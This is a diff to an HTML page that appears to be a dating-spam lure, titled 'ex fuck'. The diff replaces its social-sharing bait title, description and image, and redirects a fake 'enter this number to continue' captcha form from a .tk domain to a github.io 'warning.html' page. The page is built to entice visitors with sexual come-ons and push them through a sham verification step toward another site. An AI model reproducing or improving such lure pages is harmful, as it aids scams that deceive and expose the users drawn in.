--- a/4.html
+++ b/4.html
@@ -4,9 +4,9 @@
 <head><title>ex fuck</title>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
-<meta property="og:title" content="find your love here,messages,pictures and live chat">
-<meta property="og:description" content="You can have me,Free,Happy.">
-<meta property="og:image" content="https://cloud.githubusercontent.com/assets/25362354/22325060/02f618b6-e3df-11e6-9a20-d0b1c2e7da12.jpg">
+<meta property="og:title" content="find the best love">
+<meta property="og:description" content="single best.">
+<meta property="og:image" content="https://cloud.githubusercontent.com/assets/25414196/22403264/cedbb35c-e644-11e6-9ae2-a2db689791ad.jpg">
 <link href="http://i.imgur.com/uwQ0quy.gif" rel="shortcut icon" type="image/x-icon" />
 <meta content="" name="keywords">
 <meta content="" name="description">
@@ -90,7 +90,7 @@ background-position:center;
               <div class="panel-heading"><font style="font-size: 20px; font-family: Arial, cursive;">Please enter this number to continue</font></div>
               <div class="panel-body">
        <!-- <h1>Captcha</h1> -->
-        <form name="review" ACTION="http://mytruelovee.tk/warning.html" METHOD="get" METHOD="POST" onsubmit="return checkform(this);">
+        <form name="review" ACTION="https://lovellyhappen.github.io/warning.html" METHOD="get" METHOD="POST" onsubmit="return checkform(this);">
             <span id="txtCaptchaDiv" style="color:#000;font-weight: bold;font-family: Arial, cursive;"></span>
           <div style="padding-bottom:10px;"></div>
             <input type="hidden" id="txtCaptcha" class="form-control" />
